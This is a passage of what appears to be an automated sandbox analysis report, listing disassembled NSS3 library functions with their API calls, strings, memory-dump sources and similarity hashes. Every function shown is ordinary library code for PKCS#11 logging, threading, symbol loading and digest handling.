                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                              • API String ID: 1003633598-2270781106
                                                              • Opcode ID: 879c9c54a02e93698499dbbbdf17d0dd476a06b1706fa1fff92770720a038231
                                                              • Instruction ID: 8ec6fd760e6203a8ccac96c61dd29a1cada1161f283ee9a042e507bd9ff4304d
                                                              • Opcode Fuzzy Hash: 879c9c54a02e93698499dbbbdf17d0dd476a06b1706fa1fff92770720a038231
                                                              • Instruction Fuzzy Hash: D441B479500108AFDB20EF55DE4CB5B3BB1AF9235CF068024FA085721ADFB19885CBE2
                                                              Function 6D109C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_LoginUser), ref: 6D109C66
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D109C94
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D109CA3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D109CB9
                                                              • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6D109CDA
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D109CF5
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D109D10
                                                              • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6D109D29
                                                              • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6D109D42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                              • API String ID: 1003633598-3838449515
                                                              • Opcode ID: f0a8ca55f11881ae4f16e853925e3932a67212e76aa6269c3724b2e30ae9e093
                                                              • Instruction ID: 7041a26702974a3624f9d70a13ce52411fe846f4534ce35a9073a5624e37c0e1
                                                              • Opcode Fuzzy Hash: f0a8ca55f11881ae4f16e853925e3932a67212e76aa6269c3724b2e30ae9e093
                                                              • Instruction Fuzzy Hash: 5441D3B9944108AFDB20AF55DE5CF5B3BB1AF8631DF4A8014F6086B216DFB09814DBE1
                                                              Function 6D1E9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • calloc.MOZGLUE(00000001,00000080), ref: 6D1E9C70
                                                              • PR_NewLock.NSS3 ref: 6D1E9C85
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_NewCondVar.NSS3(00000000), ref: 6D1E9C96
                                                                • Part of subcall function 6D0BBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D0C21BC), ref: 6D0BBB8C
                                                              • PR_NewLock.NSS3 ref: 6D1E9CA9
                                                                • Part of subcall function 6D1998D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D199946
                                                                • Part of subcall function 6D1998D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0516B7,00000000), ref: 6D19994E
                                                                • Part of subcall function 6D1998D0: free.MOZGLUE(00000000), ref: 6D19995E
                                                              • PR_NewLock.NSS3 ref: 6D1E9CB9
                                                              • PR_NewLock.NSS3 ref: 6D1E9CC9
                                                              • PR_NewCondVar.NSS3(00000000), ref: 6D1E9CDA
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0BBBEB
                                                                • Part of subcall function 6D0BBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D0BBBFB
                                                                • Part of subcall function 6D0BBB80: GetLastError.KERNEL32 ref: 6D0BBC03
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D0BBC19
                                                                • Part of subcall function 6D0BBB80: free.MOZGLUE(00000000), ref: 6D0BBC22
                                                              • PR_NewCondVar.NSS3(?), ref: 6D1E9CF0
                                                              • PR_NewPollableEvent.NSS3 ref: 6D1E9D03
                                                                • Part of subcall function 6D1DF3B0: PR_CallOnce.NSS3(6D2314B0,6D1DF510), ref: 6D1DF3E6
                                                                • Part of subcall function 6D1DF3B0: PR_CreateIOLayerStub.NSS3(6D23006C), ref: 6D1DF402
                                                                • Part of subcall function 6D1DF3B0: PR_Malloc.NSS3(00000004), ref: 6D1DF416
                                                                • Part of subcall function 6D1DF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D1DF42D
                                                                • Part of subcall function 6D1DF3B0: PR_SetSocketOption.NSS3(?), ref: 6D1DF455
                                                                • Part of subcall function 6D1DF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D1DF473
                                                                • Part of subcall function 6D199890: TlsGetValue.KERNEL32(?,?,?,6D1997EB), ref: 6D19989E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D1E9D78
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9DAF
                                                              • _PR_CreateThread.NSS3(00000000,6D1E9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9D9F
                                                                • Part of subcall function 6D0BB3C0: TlsGetValue.KERNEL32 ref: 6D0BB403
                                                                • Part of subcall function 6D0BB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6D0BB459
                                                              • _PR_CreateThread.NSS3(00000000,6D1EA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9DE8
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9DFC
                                                              • _PR_CreateThread.NSS3(00000000,6D1EA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9E29
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9E3D
                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6D1E9E71
                                                              • PR_SetError.NSS3(FFFFE890,00000000), ref: 6D1E9E89
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                              • String ID:
                                                              • API String ID: 4254102231-0
                                                              • Opcode ID: 659f0eca8ee3447c4b3bd8790502a78276a276ac06b2ac56d22780729c20337e
                                                              • Instruction ID: 44381a051000392fdac6c7779138f07fbab7351c4a968c7516a961d7dcaa9fdd
                                                              • Opcode Fuzzy Hash: 659f0eca8ee3447c4b3bd8790502a78276a276ac06b2ac56d22780729c20337e
                                                              • Instruction Fuzzy Hash: EF615FB1914B06AFD710CF75C854A6BBBF8FF08248B054529E919C7715E7B0E510CBA1
                                                              Function 6D104CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6D104CF3
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D104D28
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D104D37
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D104D4D
                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6D104D7B
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D104D8A
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D104DA0
                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6D104DBC
                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6D104E20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                              • API String ID: 1003633598-3553622718
                                                              • Opcode ID: 129fbd144e97a5f5e3f47cedc2c0eedb728c5d47e437ef9f6651d59d6333e2f4
                                                              • Instruction ID: 37e2e8f747680b28a8465338ad7aae12f0fe7b0c43b4400a572bd2a0beddff97
                                                              • Opcode Fuzzy Hash: 129fbd144e97a5f5e3f47cedc2c0eedb728c5d47e437ef9f6651d59d6333e2f4
                                                              • Instruction Fuzzy Hash: 3A41C3B5504104AFD720AF50DECCB2B37B5AFAA34DF064024FA086B11ADFB49945DBE2
                                                              Function 6D107C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_Verify), ref: 6D107CB6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D107CE4
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D107CF3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D107D09
                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6D107D2A
                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6D107D45
                                                              • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6D107D5E
                                                              • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6D107D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                              • API String ID: 1003633598-3278097884
                                                              • Opcode ID: de06f33d1136268922958cc073c804514095ca74c4ddafa32d4a7a62d343acf3
                                                              • Instruction ID: 0cf73359091b532ab196999e4d15cc7de4b1413e270eebc04b569174af19713d
                                                              • Opcode Fuzzy Hash: de06f33d1136268922958cc073c804514095ca74c4ddafa32d4a7a62d343acf3
                                                              • Instruction Fuzzy Hash: 4D31B379900105AFDB20AF55DE4CF6B77B1AF8231CF0A8025F6085711ADFB19949DBE1
                                                              Function 6D19CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D19CC7B), ref: 6D19CD7A
                                                                • Part of subcall function 6D19CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6D10C1A8,?), ref: 6D19CE92
                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CDA5
                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CDB8
                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6D19CDDB
                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CD8E
                                                                • Part of subcall function 6D0C05C0: PR_EnterMonitor.NSS3 ref: 6D0C05D1
                                                                • Part of subcall function 6D0C05C0: PR_ExitMonitor.NSS3 ref: 6D0C05EA
                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6D19CDE8
                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CDFF
                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CE16
                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CE29
                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6D19CE48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                              • API String ID: 601260978-871931242
                                                              • Opcode ID: 9e62b55bca2b3d3b10183e9c83ab04405b63e58bf9e6ff40024fda0bf3f8d488
                                                              • Instruction ID: 358285af9b6499a2ede2f018161f35b0efd66063d6b2bcf23b233c7cca00d11c
                                                              • Opcode Fuzzy Hash: 9e62b55bca2b3d3b10183e9c83ab04405b63e58bf9e6ff40024fda0bf3f8d488
                                                              • Instruction Fuzzy Hash: A511E9E9D5620253FB1256B62D04B7F3D9E5B1250CF060134E906DB115FB70C590CAF3
                                                              Function 6D1E1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D1E13BC,?,?,?,6D1E1193), ref: 6D1E1C6B
                                                              • PR_NewLock.NSS3(?,6D1E1193), ref: 6D1E1C7E
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_NewCondVar.NSS3(00000000,?,6D1E1193), ref: 6D1E1C91
                                                                • Part of subcall function 6D0BBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D0C21BC), ref: 6D0BBB8C
                                                              • PR_NewCondVar.NSS3(00000000,?,?,6D1E1193), ref: 6D1E1CA7
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0BBBEB
                                                                • Part of subcall function 6D0BBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D0BBBFB
                                                                • Part of subcall function 6D0BBB80: GetLastError.KERNEL32 ref: 6D0BBC03
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D0BBC19
                                                                • Part of subcall function 6D0BBB80: free.MOZGLUE(00000000), ref: 6D0BBC22
                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,6D1E1193), ref: 6D1E1CBE
                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,?,6D1E1193), ref: 6D1E1CD4
                                                              • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D1E1193), ref: 6D1E1CFE
                                                              • PR_Lock.NSS3(?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D1A
                                                                • Part of subcall function 6D199BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D0C1A48), ref: 6D199BB3
                                                                • Part of subcall function 6D199BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D0C1A48), ref: 6D199BC8
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D3D
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,6D1E1193), ref: 6D1E1D4E
                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D64
                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D6F
                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D1E1193), ref: 6D1E1D7B
                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,6D1E1193), ref: 6D1E1D87
                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,6D1E1193), ref: 6D1E1D93
                                                              • PR_DestroyLock.NSS3(00000000,?,?,6D1E1193), ref: 6D1E1D9F
                                                              • free.MOZGLUE(00000000,?,6D1E1193), ref: 6D1E1DA8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                              • String ID:
                                                              • API String ID: 3246495057-0
                                                              • Opcode ID: 1aa761b49f913098916750889dc6ac601be8bf64fa1d6a40a90791f1c924f2e4
                                                              • Instruction ID: bcb7e084ad3530615e35adb65ab173084346819af47e7098da3ceb86d1a7d538
                                                              • Opcode Fuzzy Hash: 1aa761b49f913098916750889dc6ac601be8bf64fa1d6a40a90791f1c924f2e4
                                                              • Instruction Fuzzy Hash: A231E2F1E04B019FEB218F64AC45B2B76F8BF11648B054438F94A87351FBB1E554CBA2
                                                              Function 6D135CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6D135EC0,00000000,?,?), ref: 6D135CBE
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6D135CD7
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6D135CF0
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6D135D09
                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6D135EC0,00000000,?,?), ref: 6D135D1F
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6D135D3C
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D135D51
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D135D66
                                                              • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6D135D80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strncmp$SecureStrdup_Util
                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                              • API String ID: 1171493939-3017051476
                                                              • Opcode ID: 80892355017c1e4aa2349e4639fb205bd1660601e99ebc66b38495d66cf0ff90
                                                              • Instruction ID: a2d1effb15bb7009376c13b241266ca99937908b0f3c28dc54c92eae93098fdf
                                                              • Opcode Fuzzy Hash: 80892355017c1e4aa2349e4639fb205bd1660601e99ebc66b38495d66cf0ff90
                                                              • Instruction Fuzzy Hash: BD31C2B0A443A2ABFB010E24DC4CB3737A8BF12A58F064130FE65A7286E7F1D512C295
                                                              Function 6D136CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6D201DE0,?), ref: 6D136CFE
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D136D26
                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6D136D70
                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6D136D82
                                                              • DER_GetInteger_Util.NSS3(?), ref: 6D136DA2
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D136DD8
                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6D136E60
                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6D136F19
                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6D136F2D
                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6D136F7B
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D137011
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D137033
                                                              • free.MOZGLUE(?), ref: 6D13703F
                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6D137060
                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6D137087
                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6D1370AF
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                              • String ID:
                                                              • API String ID: 2108637330-0
                                                              • Opcode ID: 02161893bf47f69686a0c210011b5c545527ead73e6af5c68b2f2b0304f26e8c
                                                              • Instruction ID: 46e81557f2921692aa312e9e573bd94a5d02ee19bfe208f62c6f320793ca4784
                                                              • Opcode Fuzzy Hash: 02161893bf47f69686a0c210011b5c545527ead73e6af5c68b2f2b0304f26e8c
                                                              • Instruction Fuzzy Hash: FBA128719482269BEB008B24CC54B7B32A4EB91308F178939F968CB28DE7F5D845C7D3
                                                              Function 6D14AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14ADB1
                                                                • Part of subcall function 6D12BE30: SECOID_FindOID_Util.NSS3(6D0E311B,00000000,?,6D0E311B,?), ref: 6D12BE44
                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D14ADF4
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D14AE08
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D14AE25
                                                              • PL_FreeArenaPool.NSS3 ref: 6D14AE63
